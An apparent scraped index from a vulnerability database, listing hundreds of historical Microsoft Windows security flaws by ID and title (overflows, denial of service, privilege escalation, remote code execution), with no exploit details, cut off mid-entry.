Windows Unspecified Kernel System Call Registry Handling Local DoS [63726] Microsoft Windows Media Unicast Service Transport Packet Handling Remote Overflow [63468] Microsoft Windows ANI Parser BITMAPINFO Header Crafted biClrUsed Value DoS [63231] Microsoft Windows Media Player Crafted AVI File Colorspace Conversion Memory Corruption [62855] Microsoft Windows HTML Help Control ActiveX chm File Handling Arbitrary Code Execution [62811] Microsoft Windows Movie Maker / Producer IsValidWMToolsStream() Function Project File (.MSWMM) Handling Overflow [62756] Microsoft Windows VBScript MsgBox() Function helpfile Argument Arbitrary Command Execution [62660] Microsoft Windows Unspecified API Argument Validation Local DoS [62652] Microsoft Windows Media Player Crafted MPG File Handling Overflow DoS [62637] Microsoft Windows Malformed TCP SYN Packet Remote DoS (Blat) [62632] Microsoft Windows VBScript MsgBox() Function HLP File Arbitrary Command Execution [62259] Microsoft Windows Kernel Double-free Unspecified Local Privilege Escalation [62258] Microsoft Windows Kerberos Ticket-Granting-Ticket Renewal Request NULL Dereference Remote DoS [62257] Microsoft Windows DirectShow AVI File Decompression Overflow [62256] Microsoft Windows SMB Server Crafted Network Message Remote Code Execution [62255] Microsoft Windows SMB Server Crafted Packet Handling Remote DoS [62254] Microsoft Windows SMB Server Crafted Packet Handling NULL Dereference Remote DoS [62253] Microsoft Windows SMB Server NTLM Authentication Nonce Entropy Weakness [62252] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Session Termination Weakness Local Privilege Escalation [62251] Microsoft Windows Server 2008 Hyper-V Crafted Instruction Sequence DoS [62250] Microsoft Windows TCP/IP Stack ICMPv6 Router Advertisement Packet Handling Remote Code Execution [62249] Microsoft Windows TCP/IP Stack ESP Over UDP Header MDL Fragmentation Remote Code Execution [62248] Microsoft Windows TCP/IP Stack ICMPv6 Route Information Packet Handling Remote Code Execution [62247] Microsoft Windows TCP/IP Selective Acknowledgment (SACK) Value Handling Remote DoS [62245] Microsoft Windows Shell Handler ShellExecute API Crafted URL Arbitrary Command Execution [62244] Microsoft Windows SMB Client Negotiate Protocol Response Handling Remote Code Execution [62243] Microsoft Windows SMB Client Packet Handling Race Condition Remote Privilege Escalation [62242] Microsoft Windows Paint JPEG Image Decoding Overflow [61854] Microsoft Windows Virtual DOS Machine (VDM) Subsystem #GP Trap Handler (nt!KiTrap0D) Local Privilege Escalation [61676] Microsoft Windows Live Messenger msnmsgr.exe ActiveX (msgsc.14.0.8089.726.dll) ViewProfile Method MSN Messenger Session Remote DoS [61651] Microsoft Windows Embedded OpenType Font Engine LZCOMP Decompressor Font Handling Arbitrary Code Execution [61037] Microsoft Windows Indeo Codec Crafted Media Content Arbitrary Code Execution (2009-4312) [61036] Microsoft Windows Indeo Codec Crafted Media Content Arbitrary Code Execution (2009-4311) [60858] Microsoft Windows Intel Indeo32 Codec (ir32_32.dll) IV32 FourCC Code Handling Heap Corruption [60857] Microsoft Windows Indeo Codec Unspecified Memory Corruption [60856] Microsoft Windows Intel Indeo41 Codec IV41 Stream Video Decompression Overflow [60855] Microsoft Windows Intel Indeo41 Codec IV41 movi Record Handling Overflow [60836] Microsoft Windows Active Directory Federation Services (ADFS) Request Header Handling Remote Code Execution [60835] Microsoft Windows Active Directory Federation Services (ADFS) Single Sign-on Spoofing [60833] Microsoft Windows Internet Authentication Service Crafted MS-CHAP v2 Message Remote Authentication Bypass [60832] Microsoft Windows Internet Authentication Service Protected Extensible Authentication Protocol (PEAP) Message Handling Remote Memory Corruption [60831] Microsoft Windows Local Security Authority Subsystem (LSASS) ISAKMP Message Handling Resource Exhaustion Remote DoS [60368] Microsoft Windows Terminal Services msgina.dll Unrestricted Resource Lock Remote DoS [60329] Microsoft Windows 2000 NetBIOS Continuation Packet Remote DoS [60273] Microsoft Windows NT Virtual DOS Machine 16-bit Executable Permission Bypass Local Privilege Escalation [60225] Microsoft Windows XP System Restore Directory ACL Weakness Local Privilege Escalation [60210] Microsoft Windows Active Directory Malformed LDAP Client Request Remote DoS [60206] Microsoft Windows Fast User Switching (FUS) Arbitrary User Process Listing Disclosure [60145] Microsoft Windows NT cmd.exe CD Command Arbitrary Local Code Execution [60057] Microsoft Windows File Protection (WFP) Catalog File (.CAT) Modification Hash Code Comparison Bypass [59957] Microsoft Windows SMB Response Handling Remote DoS [59869] Microsoft Windows Win32k Table of Directory Entry Building Font Code Parsing Remote Code Execution [59868] Microsoft Windows Win32k GDI Kernel Component Unspecified Local Privilege Escalation [59867] Microsoft Windows Win32k Unspecified Kernel System Call Local Privilege Escalation [59865] Microsoft Windows Web Services on Devices API (WSDAPI) Message Header Handling Memory Corruption [59856] Microsoft Windows Active Directory Malformed LDAP Request Stack Exhaustion Remote DoS [59855] Microsoft Windows License Logging Server (llssrv.exe) RPC LlsrLicenseRequestW Method Remote Overflow [59819] Microsoft Windows RPC Session Handle Hijacking Remote Privilege Escalation [59738] Microsoft Windows ZIP Filename Handling Overflow DoS [59736] Microsoft Windows Media Player (WMP) on Solaris Installation Permission Weakness Local Privilege Escalation [59734] Microsoft Windows Log Clearning Function Admin Notification Weakness [59733] Microsoft Windows 2000 Terminal Services Screensaver Screen Minimization Locking Weakness [59732] Microsoft Windows Screensaver Domain Account Lock Verification Local Brute Force Weakness [59731] Microsoft Windows 2000 DCOM Client Alter Context Request Remote Information Disclosure [59730] Microsoft Windows 2000 Terminal Services Disconnect Feature Local Privilege Escalation [59515] Microsoft Windows csrss.exe Command Prompt Input Manipulation Forced Reboot DoS [59514] Microsoft Windows 2000 Task Manager Uppercase Process Name Termination Weakness [59513] Microsoft Windows NT winnt/system32 Write Access Local DoS (NT4ALL) [59509] Microsoft Windows 2000 Encrypted File System Cleartext Backup File Local Disclosure [59347] Microsoft Windows SYSKEY Registry EFS Startup Key Disclosure [59346] Microsoft Windows 2000 Crafted TCP/UDP Traffic CPU Consumption Remote DoS [59340] Microsoft Windows NT Logon Box Account Name Disclosure [59333] Microsoft Windows NT Winlogon Key Local Shutdown DoS [59325] Microsoft Windows NT Scheduler Drive Mapping Permission Weakness Local Privilege Escalation [59264] Microsoft Windows Crafted Fragmented Packet Stream Remote DoS (Jolt) [59260] Microsoft Windows NT SNMP Agent Query Saturation Remote DoS [59250] Microsoft Windows NT Fragmented Packet Handling Remote DoS (ntfrag) [59241] Microsoft Windows CreateRemoteThread Function Arbitrary Writeable Process Termination DoS [58876] Microsoft Windows SMB Packet Command Value Handling Remote Code Execution [58875] Microsoft Windows SMBv2 Packet Handling Infinitie Loop Remote DoS [58862] Microsoft Windows LSASS Malformed NTLM Authentication Packets Remote Overflow DoS [58861] Microsoft Windows Kernel Exception Handler Unspecified Local DoS [58860] Microsoft Windows Kernel User Mode PE File Handling NULL Dereference Local Privilege Escalation [58859] Microsoft Windows Kernel 64-bit Value Conversion Truncation Local Privilege Escalation [58856] Microsoft Windows CryptoAPI X.509 Certificate Object Identifier Handling Overflow Spoofing Weakness [58855] Microsoft Windows CryptoAPI X.509 Certificate Common Name Null Truncation Spoofing [58854] Microsoft Windows Indexing Service ActiveX Memory Corruption Arbitrary Code Execution [58845] Microsoft Windows Media Runtime Compressed Audio File Handling Heap Corruption Arbitrary Code Execution [58844] Microsoft Windows Media Player ASF Runtime Voice Sample Rate Handling Arbitrary Code Execution [58843] Microsoft Windows Media Player ASF Handling Overflow [58786] Microsoft Windows User Profile Unloading Session Persistence Weakness [58785] Microsoft Windows MFC Component (MFC42u.dll) AfxOleSetEditMenu Function RTF Malformed OLE Object Handling Overflow [57806] Microsoft Windows Wireless LAN AutoConfig Service (wlansvc) Frame Parsing Arbitrary Code Execution [57803] Microsoft Windows Media MP3 File Handling Memory Corruption [57802] Microsoft Windows Media ASF Header Parsing Invalid Free Arbitrary Code Execution [57799] Microsoft Windows srv2.sys Kernel Driver SMB2 Malformed NEGOTIATE PROTOCOL REQUEST Remote DoS [57798] Microsoft Windows DHTML Editing Component ActiveX Arbitrary Code Execution [57797] Microsoft Windows TCP/IP Orphaned Connection Handling Remote DoS [57796] Microsoft Windows TCP/IP Packet State Information Handling Remote Code Execution [57795] Microsoft Windows TCP/IP Implementation Queue Connection Saturation TCP State Table Remote DoS [57016] Microsoft Windows win32k.sys Embedded OpenType Font Handling DoS [56912] Microsoft Windows Terminal Services Client ActiveX Unspecified Overflow [56909] Microsoft Windows AVI Media File Parsing Unspecified Overflow [56908] Microsoft Windows Malformed AVI Header Parsing Arbitrary Code Execution [56904] Microsoft Windows Telnet NTLM Credential Reflection Remote Access [56902] Microsoft Windows Workstation Service NetrGetJoinInformation Function Local Memory Corruption Arbitrary Code Execution [56901] Microsoft Windows Message Queuing Service (MSMQ) mqac.sys IOCTL Request Parsing Local Privilege Escalation [56900] Microsoft Windows Internet Name Service (WINS) Network Packet Handling Remote Integer Overflow [56899] Microsoft Windows Internet Name Service (WINS) Push Request Handling Remote Overflow [56780] Microsoft Windows win32k.sys NtUserConsoleControl Function Memory Manipulation Local Privilege Escalation [56516] Microsoft Windows lpCmdLine Filename Whitespace Handling Weakness [56514] Microsoft Windows gzip Libraries Unspecified Remote Code Execution [56513] Microsoft Windows Autorun / NoDriveTypeAutoRun Registry Value Enforcement Weakness [55843] Microsoft Windows Embedded OpenType (EOT) Font Name Tables Parsing Overflow [55842] Microsoft Windows Embedded OpenType (EOT) Font Data Record Parsing Overflow [55645] Microsoft Windows Live Messenger (WLM) msnmsgr.exe Malformed Content-Type Header Remote DoS [55644] Microsoft Windows Live Messenger Client MSN Protocol over NAT Multiple Header Field Internal IP Disclosure [55332] Microsoft Windows PPTP Server (Raspptpe.sys) Malformed Control Packet Remote DoS [55309] Microsoft Windows ICMP Type 9 Packet Remote DoS [55050] Microsoft Windows win32k.sys Thread Handling Local Race Condition DoS [54961] Microsoft Office PowerPoint Freelance Windows Translator (FL21WIN.DLL) Layout Parsing Overflow [54943] Microsoft Windows Kernel Desktop Parameter Manipulation Local Privilege Escalation [54942] Microsoft Windows Kernel Driver Class Registration Local Privilege Escalation [54941] Microsoft Windows Kernel User Mode Pointer Passing Local Privilege Escalation [54940] Microsoft Windows Kernel Desktop Object Manipulation Local Privilege Escalation [54939] Microsoft Office Works for Windows File Converter .wps Handling Overflow [54938] Microsoft Windows Active Directory Crafted LDAP(S) Request Handling Remote DoS [54937] Microsoft Windows Active Directory Crafted LDAP(S) Request Hexdecimal DN AttributeValue Handling Arbitrary Code Execution [54936] Microsoft Windows RPC Marshalling Engine Internal State Manipulation Remote Code Execution [54935] Microsoft Windows MSHTML Search Preview Display Information Disclosure [54934] Microsoft Windows Print Spooler Load Library Crafted RPC Message Arbitrary DLL Loading Privilege Escalation [54933] Microsoft Windows Print Spooler Crafted Separator Page Arbitrary Local File Disclosure [54932] Microsoft Windows Print Spooler win32spl.dll EnumeratePrintShares Function Remote Overflow [54931] Microsoft Windows SystemParametersInfo() Function SPI_DESKWALLPAPER Call Local DoS [54191] Microsoft Windows GDI+ PNG File Handling Infinite Loop DoS [53804] Microsoft Windows Media Player MID File Handling Overflow DoS [53668] Microsoft Windows ThreadPool ACL Enforcement Weakness Local Privilege Escalation [53667] Microsoft Windows RPCSS Service Isolation Local Privilege Escalation [53666] Microsoft Windows Management Instrumentation (WMI) Service Isolation Local Privilege Escalation [53623] Microsoft Windows SearchPath File Open / Locating Unspecified Arbitrary Code Execution [53621] Microsoft Windows HTTP Services Digital Certificate Distinguished Name Mismatch Weakness [53620] Microsoft Windows HTTP Services Web Server Response Unspecified Integer Underflow [53619] Microsoft Windows HTTP Services NTLM Credential Replay Privileged Code Execution [53533] Microsoft Windows Task Manager (taskmgr.exe) I/O Activity Local Information Disclosure [53309] Microsoft Windows WINS 1Ch Registration Domain Controller Manipulation [53248] Microsoft Windows DNS Server Crafted Packets Remote Memory Consumption DoS [52892] Microsoft IE on Windows Link Click Unspecified Arbitrary Code Execution (PWN2OWN) [52694] Microsoft Windows Media Player Malformed GET Request DoS [52693] Microsoft Windows Mobile Bluetooth Stack OBEX FTP Service Traversal Arbitrary File Manipulation [52685] Microsoft Windows FTP Client Multiple Command Overflows [52683] Microsoft Windows explorer.exe Malformed PNG Handling DoS [52682] Microsoft Windows Explorer ZIP Handler DoS [52681] Microsoft Windows Firewall sessmgr.exe Port Restriction Local Bypass [52524] Microsoft Windows Invalid Pointer Local Privilege Escalation [52523] Microsoft Windows Handle Validation Local Privilege Escalation [52522] Microsoft Windows GDI Kernel Component Unspecified Remote Code Execution [52521] Microsoft Windows SChannel Certificate Based Authentication Spoofing Bypass [52520] Microsoft Windows WPAD WINS Server Registration Web Proxy MiTM Weakness [52519] Microsoft Windows DNS Server WPAD Registration Dynamic Update MiTM Weakness [52518] Microsoft Windows DNS Server Response Response Validation Transaction ID Prediction Weakness [52517] Microsoft Windows DNS Server Query Validation Spoofing [51433] Microsoft Windows Crafted CHM File Handling Overflow [51133] Microsoft Windows Media Player Multiple File Handling Remote Overflow [50567] Microsoft Windows WordPad Text Converter Unspecified Memory Corruption [50566] Microsoft Windows Explorer search-ms Protocol Handler Arbitrary Code Execution [50565] Microsoft Windows Explorer Saved Search File Handling Arbitrary Code Execution [50562] Microsoft Windows GDI WMF Image Size Parameter Parsing Overflow [50561] Microsoft Windows GDI WMF Image Parsing Integer Math Overflow [50559] Microsoft Windows Media Component Crafted ISATAP Address NTLM Credential Disclosure [50558] Microsoft Windows Media Component Service Principal Name (SPN) Credential Reflection Arbitrary Code Execution [50533] Microsoft Windows Media Services nskey.dll ActiveX CallHTMLHelp Method Overflow [50287] Microsoft Windows Vista iphlpapi.dll CreateIpForwardEntry2() Function Memory Corruption [50280] Microsoft Windows UnhookWindowsHookEx Call Saturation Race Condition Local DoS [50252] Microsoft Windows Media Player Crafted DAT File MThd Header Handling DoS [50251] Microsoft Windows Media Player Crafted MIDI File MThd Header Handling DoS [50000] Microsoft Windows Active Directory LDAP Server Bind Request User Account Enumeration [49897] Microsoft Windows Explorer Crafted ZIP File Handling DoS [49895] Microsoft Windows GDI+ gdiplus.dll Crafted ICO File Handling DoS [49736] Microsoft Windows SMB NTLM Authentication Credential Replay Remote Code Execution [49364] Cisco PIX / ASA Microsoft Windows NT VPN Domain Authentication Bypass [49243] Microsoft Windows Server Service Crafted RPC Request Handling Unspecified Remote Code Execution [49061] Microsoft Windows Ancillary Function Driver (afd.sys) Local Privilege Escalation [49060] Microsoft Windows Message Queuing Service RPC Request Handling Remote Code Execution [49058] Microsoft Windows Active Directory LDAP(S) Request Handling Remote Overflow [49057] Microsoft Windows SMB File Name Handling Remote Underflow [49056] Microsoft Windows Kernel Memory Corruption Local Privilege Escalation [49055] Microsoft Windows Kernel New Window Creation Process Arbitrary Code Execution [49054] Microsoft Windows Kernel Double-free Unspecified Local Privilege Escalation [49053] Microsoft Windows Virtual Address Descriptors (VAD) Local Privilege Escalation [48837] Microsoft Windows Vista Page Fault Handling DoS [48789] Microsoft Windows Mobile Bluetooth Device Name Overflow DoS [48359] Microsoft Windows Vista ASLR / DEP Memory Protection Bypass [48302] Microsoft Windows nslookup.exe DNS Zone Transfer Request Unspecified Arbitrary Code Execution [48153] Microsoft Windows srv.sys WRITE_ANDX SMB Packet Handling Remote DoS [48037] Microsoft Windows Image Acquisition Logger ActiveX Open Method Arbitrary File Download [48009] Microsoft Windows Kernel IopfCompleteRequest API Overflow [47963] Microsoft Windows Media Player Audio File Sampling Rate Remote Code Execution [47962] Microsoft Windows Media Encoder wmex.dll ActiveX Overflow [47412] Microsoft Windows Event System Crafted Request Array Index Handling Remote Privilege Escalation [47411] Microsoft Windows Event System Per-user Subscription Crafted Request Remote Privilege Escalation [47403] Microsoft Windows Messenger ActiveX (Messenger.UIAutomation.1) Remote Privileged Operations [47396] Microsoft Windows IPsec Policy Import Failure Cleartext Remote Information Disclosure [47395] Microsoft Windows Image Color Management System (MSCMS) mscms.dll InternalOpenColorProfile Function ICM Image File Handling Overflow [46990] Microsoft Windows Explorer (explorer.exe) Unspecified WMF Handling DoS [46801] Microsoft Windows Calendar Malformed ICS File Handling DoS [46778] Microsoft Windows DNS Query ID Field Prediction Cache Poisoning [46777] Microsoft Windows DNS Socket Entropy Weakness Cache Poisoning [46774] Microsoft Windows Explorer Saved Search File Handling DoS [46210] Microsoft Windows Installer msiexec.exe /uninstall Option GUID Value Overflow [46068] Microsoft Windows Pragmatic General Multicast (PGM) Fragment Handling Remote DoS [46067] Microsoft Windows Pragmatic General Multicast (PGM) Packet Handling Remote DoS [46066] Microsoft Windows Active Directory LDAP Request Processing Remote DoS [46063] Microsoft Windows Internet Name Service (WINS) Packet Handling Local Privilege Escalation [46062] Microsoft Windows Speech Components (sapi.dll) Speech Recognition Code Execution [46061] Microsoft Windows Bluetooth SDP Packet Processing Remote Code Execution [45809] Microsoft Windows Vista Kernel Unspecified Remote Issue [45523] Microsoft Windows Live Messenger GDI Engine Malformed File Handling Overflow [45521] Microsoft Windows Explorer (explorer.exe) Malformed PNG Handling Remote DoS [45280] Microsoft Windows Media Player (WMP) mplay32.exe MP3 Filename Handling Local Overflow [45048] Microsoft Windows XP I2O Utility Filter Driver (i2omgmt.sys) Local Privilege Escalation [44975] Microsoft Windows CE GIF Imaging Component Unspecified Arbitrary Code Execution [44974] Microsoft Windows CE JPEG (GDI+) Handling Unspecified Arbitrary Code Execution [44880] Microsoft Windows msjet40.dll MDB File Handling Overflow [44580] Microsoft Windows Microsoft Distributed Transaction Coordinator (MSDTC) SeImpersonatePrivilege User Right Local Privilege Escalation [44215] Microsoft Windows GDI EMF Filename Parameter Handling Overflow [44214] Microsoft Windows GDI WMF Handling CreateDIBPatternBrushPt Function Overflow [44213] Microsoft Windows GDI (gdi32.dll) EMF File Handling Multiple Overflows [44206] Microsoft Windows Kernel Unspecified Privilege Escalation [44200] Microsoft Windows Random Number Generator (RNG) CryptGenRandom Function Prediction Weakness [44172] Microsoft Windows DNS Client Predictable Transaction ID Spoofing [44171] Microsoft Windows HxTocCtrl ActiveX (hxvz.dll) Memory Corruption [44018] Microsoft Windows Vista SP1 Page Protection Unspecified Bypass [43773] Microsoft Windows Explorer (explorer.exe) GIF File Handling Remote DoS [43715] Microsoft Windows Media Player (WMP) AIFF File Handling DoS [43603] Microsoft Windows DNS Server Dynamic Update Mechanism Client Authentication Bypass [43434] Microsoft Windows Vista NoDriveTypeAutoRun Auto-Play Bypass [43307] Microsoft Windows Explorer (explorer.exe) AVI Handling Right-Click Action DoS [42579] 3ivx MPEG-4 on Microsoft Windows Media Player (WMP) mplayer2.exe MP4 File Handling Overflow [41553] Microsoft Windows Explorer BMP Width Dimension Handling Overflow [41491] Microsoft Windows Vista Crafted DHCP Response DoS [41463] Microsoft Windows OLE Automation Unspecified Memory Corruption Remote Code Execution [41156] Microsoft Windows x64 Kernel PatchGuard Bypass [41155] Microsoft Windows Hardware-enforced DEP Bypass [41154] Microsoft Windows XP EFS Cleartext Password Storage [41097] Microsoft Windows Task Scheduler (at.exe) Local Privilege Escalation [41093] Microsoft Windows Media Player (WMP) MSIE Static Invocation HTML Rendering Weakness [41092] Microsoft Windows DNS Service Predictable Transaction ID Weakness [41090] Microsoft Windows w/ IE7 Shell32.dll Crafted URL Third-party Application Arbitrary Command Execution [41065] Microsoft Windows kernel32.dll Multiple Function DoS [41064] Microsoft Windows ntdll.dll Multiple Function DoS [41059] Microsoft Windows ARP Saturation Remote DoS [40071] Microsoft Windows LSASS Crafted LPC Request Local Privilege Escalation [40070] Microsoft Windows TCP/IP IGMPv3 / MLDv2 Packet Handling Remote Code Execution [40069] Microsoft Windows TCP/IP ICMP RDP Packet Handling Remote DoS [39521] Cisco Security Agent for Microsoft Windows Crafted SMB Packet Remote Overflow [39131] Microsoft Windows Media Player Crafted AU File Application Crash Remote DoS [39127] Microsoft Windows DirectX WAV / AVI File Parsing Arbitrary Code Execution [39126] Microsoft Windows DirectX SAMI File Parsing Arbitrary Code Execution [39125] Microsoft Windows Vista SMBv2 Signing Unspecified Remote Code Execution [39124] Microsoft Windows Vista Kernel Legacy Reply Path Validation Local Privilege Escalation [39123] Microsoft Windows Message Queuing MSMQ Message Handling Arbitrary Code Execution [39122] Microsoft Windows Media Format Runtime ASF Parsing Arbitrary Code Execution [39014] Microsoft Windows RunAs Command Local Arbitrary Process DoS [38991] Microsoft Windows PNG Image IHDR block Multiple Crafted Value Remote DoS [38499] Microsoft Windows Mobile ActiveSync USB Weak PIN/Password Encryption [38494] Microsoft Windows Graphics Device Interface (GDI+, GdiPlus.dll) ICO Handling DoS [37637] Microsoft Windows Crafted HLP File Overflow [37635] Microsoft Windows Virtual DOS Machine (VDM) PhysicalMemory Race Condition Local Privilege Escalation [37631] Microsoft Windows Malformed NNTP Response Remote Memory Corruption [37629] Microsoft Windows 2000 RPC Authentication Unspecified Information Disclosure [37628] Microsoft Windows 2000 RPC Authentication Crafted Request Remote DoS [37627] Microsoft Windows Kodak Image Viewer Image File Handling Arbitrary Code Execution [37105] Microsoft Windows mfc42.dll / mfc42u.dll CFileFind Class FindFile() Function Overflow [36938] Microsoft Windows XP Kernel Process Scheduler Local DoS [36937] Microsoft Windows / IE ActiveX (triedit.dll) Multiple Property NULL Pointer DoS [36935] Microsoft Windows Services for UNIX Local Privilege Escalation [36393] Microsoft Windows Vista Weather Gadgets Crafted HTML Attribute Unspecified Issue [36392] Microsoft Windows Vista Contacts Gadget Crafted Contact Information Arbitrary Code Execution [36391] Microsoft Windows Vista Feed Headlines Gadgets RSS Feed XSS [36390] Microsoft Windows Vector Markup Language (VML) VGX.DLL CDownloadSink Class Overflow [36388] Microsoft Windows Graphics Rendering Engine (GDI) Metafile Image Handling Overflow [36387] Microsoft Windows OLE Automation TextNode Object substringData Method Overflow [36386] Microsoft Windows Media Player Skin File Handling Crafted Header Arbitrary Code Execution [36385] Microsoft Windows Media Player Skin File Handling Overflow [36149] Microsoft IE on Windows Mobile Unspecified Overflow DoS [36148] Microsoft Windows Mobile Pictures and Videos Malformed JPEG DoS [36146] Microsoft Windows Terminal Services TLS Downgrade Weakness [36145] Microsoft Windows Event Viewer (eventvwr.exe) Log Data Exclusion [36144] Microsoft Windows Bluetooth Unspecified Remote Privilege Escalation [36143] Microsoft Windows Mobile Pocket PC Edition Unspecified Remote Privilege Escalation [36141] Microsoft Windows Explorer Ole32.dll Crafted Document Summary Information DoS [36138] Microsoft Windows Active Directory Time Restriction User Enumeration [35962] Microsoft Windows XP Registry QHEADLES Permission Weakness [35961] Microsoft Windows Active Directory LDAP Service Crafted Request Remote DoS [35960] Microsoft Windows Active Directory LDAP Service Convertible Attribute Remote Code Execution [35952] Microsoft Windows Vista Teredo Crafted IPv6 Traffic Blocking Rule Bypass [35637] Microsoft Windows Unspecified Remote Code Execution [35347] Microsoft Windows Schannel Security Package Crafted Digital Signature Arbitrary Code Execution [35346] Microsoft Outlook Express / Windows Mail MHTML Content Disposition Parsing Cross Domain Information Disclosure [35345] Microsoft Outlook Express / Windows Mail URL Parsing Cross Domain Information Disclosure [35344] Microsoft Windows Vista Local User Information Data Stores Information Disclosure [35341] Microsoft Windows Win32 API Unspecified Remote Code Execution [34490] Microsoft Windows Explorer Folder Browsing WMV Handling DoS [34103] Microsoft Windows Web Proxy Autodiscovery Protocol (WPAD) DNS Subversion [34102] Microsoft Windows Vista Mail Client Crafted Link Arbitrary Program Execution [34101] Microsoft Windows XP winmm.dll mmioRead Function DoS [34100] Microsoft Windows DNS RPC Interface Zone Name Remote Overflow [34099] Microsoft Windows TrueType Fonts Rasterizer Local Privilege Escalation [34098] Microsoft Windows GDI Functions Windows Metafile (WMF) Handling DoS [34097] Microsoft Windows GDI Enhanced Metafile (EMF) Handling Local Privilege Escalation [34096] Microsoft Windows GDI Invalid Window Size Local Privilege Escalation [34095] Microsoft Windows GDI Crafted Image Local Privilege Escalation [34011] Microsoft Windows Kernel Mapped Memory Local Privilege Escalation [34010] Microsoft Windows XP UPnP Remote Memory Corruption [34009] Microsoft Windows Agent URL Parsing Memory Corruption [34008] Microsoft Windows Vista CSRSS Local Privilege Escalation [33668] Microsoft Windows Vista Meeting Space DFSR.exe TCP Connection Persistence [33667] Microsoft Windows Vista Persistent Established Teredo Address [33666] Microsoft Windows Vista Teredo nonce Spoofing [33665] Microsoft Windows Vista Neighbor Discovery Crafted Neighbor Advertisement Redirect [33664] Microsoft Windows Vista Crafted Gratuitous ARP Overwrite DoS [33663] Microsoft Windows Vista LLTD Mapper HELLO Packet Spoofing [33662] Microsoft Windows Vista LLTD Mapper Real Source Field Host Spoofing [33661] Microsoft Windows Vista LLTD Responder Race Condition Host Spoofing [33660] Microsoft Windows Vista LLTD Mapper EMIT Packet Gathering Remote DoS [33635] AMD ATI Radeon for Microsoft Windows Vista atikmdag.sys Kernel Mode Driver DoS [33628] Microsoft Windows NDISTAPI.sys Permission Weakness Local DoS [33474] Microsoft Windows ReadDirectoryChangesW API Function File System Information Disclosure [33307] Microsoft Windows Media MID Malformed Header Chunk DoS [33306] Microsoft Windows Explorer explorer.exe WMV File Handling DoS [33219] Microsoft Windows Live Messenger Gestual Emoticon Saturation CPU Consumption DoS [32629] Microsoft IE on Windows Mobile Malformed WML Page Unspecified DoS [32628] Microsoft Windows / IE ActiveX (mshtml.dll) Multiple Property NULL Pointer DoS [32445] Microsoft Windows Workstation Service NetrWkstaUserEnum RPC Request DoS [31897] Microsoft Windows CSRSS NtRaiseHardError Function Arbitrary Memory Disclosure [31890] Microsoft Windows Shell New Hardware Local Privilege Escalation [31889] Microsoft Windows XP SP2 Image Aquisition Service Local Privilege Escalation [31885] Microsoft Windows OLE Dialog Memory Corruption Remote Code Execution [31884] Microsoft Windows HTML Help ActiveX Control Arbitrary Code Execution [31659] Microsoft Windows CSRSS MessageBox Function Privilege Escalation [31645] Microsoft Windows DNS Recursive Query DoS [30997] Microsoft Windows .manifest File Handling Local DoS [30871] Microsoft Windows DRM drmstor.dll ActiveX Object StoreLicense Function Memory Corruption [30823] Microsoft Windows Print Spooler (spoolsv.exe) RpcGetPrinterData Function DoS [30821] Microsoft Outlook Express Windows Address Book Contact Record Code Execution [30819] Microsoft Windows Media Player ASX Playlist Handling Overflow [30818] Microsoft Windows Media Player ASF Parsing Overflow [30817] Microsoft Windows Remote Installation Service TFTP Arbitrary File Overwrite [30811] Microsoft Windows SNMP Service Remote Overflow [30405] Microsoft Windows Active Directory Unspecified DoS [30263] Microsoft Windows Workstation Service Crafted Message Remote Overflow [30262] Microsoft Windows Agent ACF File Handling Memory Corruption [30261] Microsoft Windows Client Service for NetWare (CSNW) Crafted Message Remote DoS [30260] Microsoft Windows Client Service for NetWare (CSNW) Crafted Message Remote Code Execution [30214] Microsoft Windows GDI Kernel Structure Modification Code Execution [30096] Microsoft Windows NAT Helper Components ipnathlp.dll with ICS Malformed DNS Query DoS [29529] Microsoft Windows 2000 creator.dll ActiveX COM Object Memory Corruption [29528] Microsoft Windows 2000 msdxm.ocx ActiveX COM Object Memory Corruption [29527] Microsoft Windows 2000 myinfo.dll ActiveX COM Object Memory Corruption [29526] Microsoft Windows 2000 ciodm.dll ActiveX COM Object Memory Corruption [29439] Microsoft Windows Server Service Crafted SMB Packet Unspecified Issue [29424] Microsoft Windows Object Packager File Extension Dialog Spoofing [29409] Microsoft Windows TCP 135 Crafted Packet Saturation DoS [29351] Microsoft Windows Terminal Services tsuserex.dll COM Object Instantiation [29231] Microsoft Windows Help File Viewer (winhlp32.exe) HLP File Arbitrary Code Execution [29128] Microsoft Windows gdiplus.dll Divide-by-zero DoS [28731] Microsoft Windows Pragmatic General Multicast (PGM) Multicast Message Arbitrary Code Execution [28729] Microsoft Windows Indexing Service Unspecified XSS [28372] Microsoft Windows Explorer URL Passing Recursive file Tag Local DoS [28208] Microsoft Windows Live Messenger Contact List .ctt File Heap Overflow [27848] Microsoft Windows Kernel Unspecified Local Privilege Escalation [27847] Microsoft Windows Unhandled Exception Unspecified Remote Code Execution [27846] Microsoft Windows Winlogon Search Path Subversion Local Privilege Escalation [27845] Microsoft Windows Server Service Crafted RPC Message Remote Overflow [27844] Microsoft Windows DNS Client Service Record Response Overflow [27843] Microsoft Windows Winsock API Hostname Remote Code Execution [27797] Microsoft Windows GDI library (gdi32.dll) createBrushIndirect Function WMF Parsing DoS [27644] Microsoft Windows Server Driver (srv.sys) Crafted SMB Packet NULL Dereference DoS [27155] Microsoft Windows Server Service SRV.SYS Crafted Request SMB Information Disclosure [27154] Microsoft Windows Server Service SRV.SYS First-class Mailslot Message Remote Overflow [27152] Microsoft Windows IIS ASP Page Processing Overflow [27151] Microsoft Windows DHCP Client Service Crafted Response Overflow [26440] Microsoft Windows SMB MrxSmbCscIoctlOpenForCopyChunk Function Overflow [26439] Microsoft Windows SMB MRXSMB.SYS MrxSmbCscIoctlCloseForCopyChunk Remote DoS [26438] Microsoft Windows RPC Mutual Authentication Server Spoofing [26437] Microsoft Windows RRAS RASMAN Remote Overflow [26436] Microsoft Windows RASMAN RPC Request Remote Overflow [26433] Microsoft Windows TCP/IP Protocol Driver Source Routing Overflow [26432] Microsoft Windows jgdw400.dll ART Image Rendering Overflow [26431] Microsoft Windows Graphics Rendering Engine PolyPolygon Function Overflow [26430] Microsoft Windows Media Player PNG Processing Overflow [25949] Microsoft Windows INETCOMM.DLL mhtml: URI Overflow [25761] Microsoft Windows NTDLL.DLL RtlDosPathNameToNtPathName_U API Path Conversion Weakness [25501] Microsoft Windows itss.dll CHM Processing Overflow [25336] Microsoft Windows Distributed Transaction Coordinator (DTC) BuildContextW Request DoS [25335] Microsoft Windows Distributed Transaction Coordinator (DTC) CRpcIoManagerServer::BuildContext Function Remote Overflow [24802] Microsoft Windows Help winhlp32.exe Embedded Image Processing Overflow [24519] Microsoft Outlook Express Windows Address Book (.wab) Processing Overflow [24516] Microsoft Windows Explorer COM Object Handling Remote Code Execution [23136] Microsoft 